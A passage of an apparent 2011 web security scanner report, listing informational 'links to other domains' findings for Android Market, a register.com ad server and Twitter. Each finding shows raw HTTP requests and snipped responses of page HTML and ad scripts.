Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jul 2011 01:59:59 GMT
Expires: Wed, 13 Jul 2011 01:59:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 63772

<!DOCTYPE html><!--
Content-type: Preventing MHTML XSS in IE.

--><html><head><script type="text/javascript">function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t
...[SNIP]...
</script><script src="https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US"></script>
...[SNIP]...
</script><script src="https://apis.google.com/js/plusone.js">{"lang": "en_US"}</script>
...[SNIP]...
</a> <a target=_blank href="https://mail.google.com/mail/" class=gb1>Gmail</a>
...[SNIP]...
</a> <a target=_blank href="https://www.google.com/calendar" class=gb2>Calendar</a> <a target=_blank href="https://picasaweb.google.com/home" class=gb2>Photos</a> <a target=_blank href="https://docs.google.com/" class=gb2>Documents</a> <a target=_blank href="https://www.google.com/reader/" class=gb2>Reader</a> <a target=_blank href="https://sites.google.com/" class=gb2>Sites</a>
...[SNIP]...
</span><a id="gb_70" href="https://www.google.com/accounts/ServiceLogin?service=androidmarket&amp;passive=86400&amp;continue=https://market.android.com/details?id%3Dcom.avai.amp.pbn_delaware&amp;followup=https://market.android.com/details?id%3Dcom.avai.amp.pbn_delaware" class=gb4>Sign in</a>
...[SNIP]...
<div class="doc-banner-icon"><img class="photo" src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/hi-512-2" /></div>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.avai.amp.pbn_northcarolina&feature=more_from_developer"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_northcarolina/hi-512-3"alt="Approved NC State Parks Guide"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.avai.amp.lib.pbn_penn&feature=more_from_developer"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.lib.pbn_penn/hi-512-9"alt="Official PA State Parks Guide"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.avai.amp.pbn_rhodeisland&feature=more_from_developer"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_rhodeisland/hi-256-1-5a7a027a6df4edf63297cbe745b63b5f0b2082d9"alt="Official RI State Parks Guide"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.avai.amp.pbn_kentucky&feature=more_from_developer"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_kentucky/hi-256-0-2fd0850ee708a2ec8ffe9bb989a243fe96491f3a"alt="Official KY State Parks Guide"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.trimble.outdoors.backpacker.android&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.trimble.outdoors.backpacker.android/hi-512-6"alt="Backpacker GPS Trails Pro"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.jimbl.campingtripplanner&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.jimbl.campingtripplanner/hi-256-1-c1707515eea19ad0d66941225fa9c567fc8bbc57"alt="Camping Trip Planner"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.mictale.gpsessentials&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.mictale.gpsessentials/hi-512-3"alt="GPS Essentials"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.crittermap.backcountrynavigator.license&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.crittermap.backcountrynavigator.license/hi-256-16-333eb755a682178f0627bcb070fe2a9c8c8942db"alt="BackCountry Navigator PRO"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<div class="carousel-page"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-0-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-1-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-2-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /></div><div class="carousel-page"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-3-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-4-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /></div>
...[SNIP]...

12.7. https://market.android.com/developer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /developer

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /developer?pub=My+Local+TV HTTP/1.1
Host: market.android.com
Connection: keep-alive
Referer: https://market.android.com/details?id=com.genwi.delaware
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=9cae866da36d6f34:TM=1310522402:LM=1310522402:S=Vufsd0X4Ov5c6tLC; NID=48=VB2kjZD9U7lL0X5uVLO8CGkeV3LlNTexxDeK5xpGpR0miadYsojCwg0qEcRa01gcj7UmK83UBT_BdbsjeNk4fxQErDPrh6J4wrWEszjQL6iYbEaav3xrsou2T0DMJdba

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jul 2011 02:00:24 GMT
Expires: Wed, 13 Jul 2011 02:00:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 49394

<!DOCTYPE html><!--
Content-type: Preventing MHTML XSS in IE.

--><html><head><script type="text/javascript">function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t
...[SNIP]...
</script><script src="https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US"></script>
...[SNIP]...
</script><script src="https://apis.google.com/js/plusone.js">{"lang": "en_US"}</script>
...[SNIP]...
</a> <a target=_blank href="https://mail.google.com/mail/" class=gb1>Gmail</a>
...[SNIP]...
</a> <a target=_blank href="https://www.google.com/calendar" class=gb2>Calendar</a> <a target=_blank href="https://picasaweb.google.com/home" class=gb2>Photos</a> <a target=_blank href="https://docs.google.com/" class=gb2>Documents</a> <a target=_blank href="https://www.google.com/reader/" class=gb2>Reader</a> <a target=_blank href="https://sites.google.com/" class=gb2>Sites</a>
...[SNIP]...
</span><a id="gb_70" href="https://www.google.com/accounts/ServiceLogin?service=androidmarket&amp;passive=86400&amp;continue=https://market.android.com/developer?pub%3DMy%2BLocal%2BTV&amp;followup=https://market.android.com/developer?pub%3DMy%2BLocal%2BTV" class=gb4>Sign in</a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wral" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wral/hi-256-0-9c9c992e5630164e28f9d372a3a1e289e9760830"alt="WRAL" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.kmsp" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.kmsp/hi-512-10"alt="KMSP FOX 9 News Minneapolis" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wood" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wood/hi-256-0-7988f7aad1c726b7a2e60197b46b14d7f895e804"alt="WOODTV" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wtnh" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wtnh/hi-512-5"alt="wtnh.com" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.kare" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.kare/hi-512-7"alt="KARE 11 News Mpls.-St. Paul" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.kdfw" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.kdfw/hi-256-1-a465966661f1fcbfe547ba368b062b1821959489"alt="FOX 4 Dallas-Fort Worth" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wfxt" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wfxt/hi-512-7"alt="MyFoxBoston FOX 25 News" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.kriv" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.kriv/hi-512-16"alt="MyFoxHouston FOX 26 News" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wjbk" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wjbk/hi-512-8"alt="FOX 2 News" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.waga" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.waga/hi-512-6"alt="myfoxatlanta" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wavy" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wavy/hi-256-0-cd96652761ca2d7aea8c1964fc532fb8574259ce"alt="WAVY.com" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wcpo" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wcpo/hi-512-4"alt="WCPO.com" /></a>
...[SNIP]...

12.8. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.register.com
Path:   /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:39:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW804dg/MAAlLm; expires=Sat, 13-Jul-13 11:39:31 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11791
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<script language=javascript type=text/javascript> \n');
document.write ('<!-- -- START: POP TYPE CONTROLS -- --> \n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_pop_under.js" async="async" defer="defer" charset="utf-8"></script>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1547657032/Bottom2/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_ifrm.js" charset="utf-8"></script>');
}
if (position == 'Position3') {
document.write ('<iframe src="https://view.atdmt.com/00F/iview/201823116/direct;wi.300;hi.250/01?click=http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/L27/1240745374/Position3/Register/Vistaprint300x250ROS_RON_Q32011/Vistaprint300x250ROS_RON_Q22011.html/7263485738303464672f4d41416c4c6d?" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');
document.write ('<script language="JavaScript" type="text/javascript">
...[SNIP]...
Position3/Register/Vistaprint300x250ROS_RON_Q32011/Vistaprint300x250ROS_RON_Q22011.html/7263485738303464672f4d41416c4c6d?http://clk.atdmt.com/00F/go/201823116/direct;wi.300;hi.250/01/" target="_blank"><img border="0" src="https://view.atdmt.com/00F/view/201823116/direct;wi.300;hi.250/01/" /></a>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1874750037/x02/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1181491002/x03/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1438515215/x04/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1568546716/x05/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

12.9. http://twitter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=cloudscan HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCLGgPSExAToHaWQiJTk5YTFkNGYxZTM3ZTcz%250ANTcxNmIxMjZmNzQ0M2Y4NWE3Ogxjc3JmX2lkIiVjYWE2ZmYxYzNjZjAxZTE1%250ANjJhZDg3ODIwZGYwYmUxOCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--f0f51b0587c8f9d20257809023786f0390d24b19; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.1.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:06:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522795-94080-62477
ETag: "326c50fac38d248889240e8355daa3cc"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:06:35 GMT
X-Runtime: 0.13037
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 1e8653f9d3cb1d319de2bb12de9a68f7df16673f
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWE0MmQ5ZTMyODll%250AN2YzNzk1YTQwNTU0ZDEyNDI0Mjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYjkzN2M5%250AMGZhOWIxZTBjNGZmMTg0MDAyZDU1NjZjZjE6D2NyZWF0ZWRfYXRsKwhiTDwh%250AMQE%253D--96ec00d2df88e8ffa6efe2dfd5bcd5bc4bf834d2; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50504
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<link href="/phoenix/favicon.ico" rel="shortcut icon" type="image/x-icon" />


<link rel="stylesheet" href="http://a2.twimg.com/a/1310499774/phoenix/css/phoenix.bundle.css" type="text/css" media="screen" />


<noscript>
...[SNIP]...
<a data-user-id="1344951" href="/#!/wired" title="Wired"><img src="http://a1.twimg.com/profile_images/130500759/73x73_wired_normal.jpg" alt="Wired" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14348594" href="/#!/hodgman" title="hodgman"><img src="http://a2.twimg.com/profile_images/1362208843/for_twitter_5-20-11_normal.jpg" alt="hodgman" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="24752484" href="/#!/OpenGov" title="Open Government"><img src="http://a0.twimg.com/profile_images/282596621/600px-US-OfficeOfScienceAndTechnologyPolicy-Seal_normal.gif" alt="Open Government" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="6480682" href="/#!/azizansari" title="Aziz Ansari"><img src="http://a2.twimg.com/profile_images/421377161/azizlittletwitter_normal.jpg" alt="Aziz Ansari" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="11347122" href="/#!/GavinNewsom" title="Gavin Newsom"><img src="http://a2.twimg.com/profile_images/1320377184/edited_normal.jpg" alt="Gavin Newsom" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="1769551" href="/#!/nytimeshealth" title="NYTimes Health"><img src="http://a3.twimg.com/profile_images/307387871/Health_normal.bmp" alt="NYTimes Health" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18949452" href="/#!/FT" title="Financial Times"><img src="http://a1.twimg.com/profile_images/1316311238/FT-square-72_normal.png" alt="Financial Times" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="113420831" href="/#!/PressSec" title="Jay Carney (EOP)"><img src="http://a3.twimg.com/profile_images/1254292772/presssec_twitter_large_normal.jpg" alt="Jay Carney (EOP)" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="13201312" href="/#!/WWF" title="WWF"><img src="http://a1.twimg.com/profile_images/782905483/logofreetabnoslogan45mm_normal.jpg" alt="WWF" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="62442994" href="/#!/AndersFoghR" title="AndersFogh Rasmussen"><img src="http://a1.twimg.com/profile_images/345370384/20090730_ramussen_rdax_150x117_normal.jpg" alt="AndersFogh Rasmussen" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15668745" href="/#!/stokereport" title="stokereport"><img src="http://a1.twimg.com/profile_images/230326317/clanBomb80x80_normal.png" alt="stokereport" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14165865" href="/#!/dosomething" title="DoSomething.org"><img src="http://a1.twimg.com/profile_images/1197409570/dslogo2_normal.png" alt="DoSomething.org" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15446126" href="/#!/designmilk" title="Design Milk"><img src="http://a3.twimg.com/profile_images/1230252841/DMLogoTM-carton-icon-facebook-twitter_normal.jpg" alt="Design Milk" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="9855382" href="/#!/SenateFloor" title="U.S. Senate Floor"><img src="http://a1.twimg.com/profile_images/73350787/SenateFloor_normal.jpg" alt="U.S. Senate Floor" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18392906" href="/#!/BoF" title="Business of Fashion"><img src="http://a2.twimg.com/profile_images/1288338673/bOf_normal.jpg" alt="Business of Fashion" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="34554134" href="/#!/SETIInstitute" title="The SETI Institute"><img src="http://a3.twimg.com/profile_images/420586010/SETI_logo_CMYK_normal.jpg" alt="The SETI Institute" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16727535" href="/#!/lancearmstrong" title="Lance Armstrong"><img src="http://a2.twimg.com/profile_images/1207013292/725a7cb3-12f0-41c4-9775-99a8fd1784c4_normal.png" alt="Lance Armstrong" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="62591681" href="/#!/EdwardNorton" title="Edward Norton"><img src="http://a1.twimg.com/profile_images/442074010/Harlan_normal.jpg" alt="Edward Norton" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15316815" href="/#!/sarahdessen" title="sarahdessen"><img src="http://a1.twimg.com/profile_images/1282997489/WhatHappenedtoGoodbyesmall_normal.jpg" alt="sarahdessen" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="44039298" href="/#!/sethmeyers21" title="Seth Meyers"><img src="http://a0.twimg.com/profile_images/267298914/n700068668_5523_normal.jpg" alt="Seth Meyers" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="783214" href="/#!/twitter" title="Twitter"><img src="http://a0.twimg.com/profile_images/1124040897/at-twitter_normal.png" alt="Twitter" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="73181712" href="/#!/TheJusticeDept" title="The Justice Dept"><img src="http://a2.twimg.com/profile_images/445550654/twitter_logo_normal.png" alt="The Justice Dept" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="1917731" href="/#!/thehill" title="The Hill"><img src="http://a1.twimg.com/profile_images/74105303/thehill_normal.png" alt="The Hill" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="93957809" href="/#!/ericschmidt" title="Eric Schmidt"><img src="http://a1.twimg.com/profile_images/565244113/edited_twit_normal.jpg" alt="Eric Schmidt" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="26784273" href="/#!/charitywater" title="charity: water"><img src="http://a0.twimg.com/profile_images/1128418096/jerry_can_normal.jpg" alt="charity: water" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="749863" href="/#!/hotdogsladies" title="Merlin Mann"><img src="http://a0.twimg.com/profile_images/51857279/merlin_icon_184-1_normal.png" alt="Merlin Mann" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14128602" href="/#!/momfluential" title="Ciaran Blumenfeld"><img src="http://a0.twimg.com/profile_images/1359177515/avatarme_normal.jpg" alt="Ciaran Blumenfeld" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="188490841" href="/#!/HeathBell21" title="Heath Bell"><img src="http://a1.twimg.com/profile_images/1133209200/heath_normal.jpg" alt="Heath Bell" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15130854" href="/#!/MyLastBite" title="Jo Maxwell Stougaard"><img src="http://a1.twimg.com/profile_images/1390070643/JoMLBProfileBread1BEST_normal.jpg" alt="Jo Maxwell Stougaard" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="300392950" href="/#!/TwitterSports" title="Twitter Sports"><img src="http://a2.twimg.com/profile_images/1395294125/sports_a_normal.png" alt="Twitter Sports" height="48" width="48" /></a>
...[SNIP]...

12.10. http://twitter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=cloudscan HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwixoD0hMQE6%250AB2lkIiU5OWExZDRmMWUzN2U3MzU3MTZiMTI2Zjc0NDNmODVhNzoMY3NyZl9p%250AZCIlY2FhNmZmMWMzY2YwMWUxNTYyYWQ4NzgyMGRmMGJlMTgiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--50bfdb52e14835d473c0b9478dd99f22193f449a; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.2.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:05:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522738-96358-4043
ETag: "3d44201a6509a8eae4ebf3beb837dac5"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:05:38 GMT
X-Runtime: 0.10444
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8b760d1227a4579d66ff8cec6629b19f5c785733
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50556
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<link href="/phoenix/favicon.ico" rel="shortcut icon" type="image/x-icon" />


<link rel="stylesheet" href="http://a2.twimg.com/a/1310499774/phoenix/css/phoenix.bundle.css" type="text/css" media="screen" />


<noscript>
...[SNIP]...
<a data-user-id="16568227" href="/#!/GettyMuseum" title="J. Paul Getty Museum"><img src="http://a0.twimg.com/profile_images/118308448/squareGettyWordmark_normal.jpg" alt="J. Paul Getty Museum" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="24907662" href="/#!/SomalyMam" title="Somaly Mam"><img src="http://a1.twimg.com/profile_images/100678623/photo_somaly_normal.jpg" alt="Somaly Mam" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="3459051" href="/#!/Greenpeace" title="Greenpeace"><img src="http://a1.twimg.com/profile_images/1380169114/logo_twitter_bigger_normal.jpg" alt="Greenpeace" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="2172" href="/#!/laughingsquid" title="Laughing Squid"><img src="http://a3.twimg.com/profile_images/340068086/laughing_squid_logo_normal.jpg" alt="Laughing Squid" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="36823" href="/#!/anildash" title="Anil Dash"><img src="http://a2.twimg.com/profile_images/1364557668/image_normal.jpg" alt="Anil Dash" height="48" width="48" /></a>
...[SNIP]...
